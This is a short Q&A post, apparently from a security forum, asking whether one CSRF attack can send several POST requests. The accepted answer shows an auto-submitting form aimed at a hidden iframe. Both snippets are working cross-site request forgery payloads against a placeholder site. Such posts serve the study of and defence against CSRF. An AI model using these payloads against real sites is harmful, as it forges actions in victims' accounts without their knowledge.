# Possible to submit multiple POST requests using CSRF?

Tags: web-application, csrf

I am aware that you can execute a POST request using CSRF using the method below:

```
<form name="x" action="http://site/index/dosomething" enctype="text/plain" method="post">
    <!-- stuff -->
</form>
<script>document.x.submit();</script>
```

But this redirects the browser to the target site.  Is it possible to execute multiple POST requests using a single CSRF attack?

Answer (score 7, accepted):

Yep - using an iframe is one approach:

```
<form name="x" action="http://site/index/dosomething" enctype="text/plain" method="post" target="thing">
<!-- stuff -->
</form>
<iframe name="thing"/>
<script>document.x.submit();</script>
```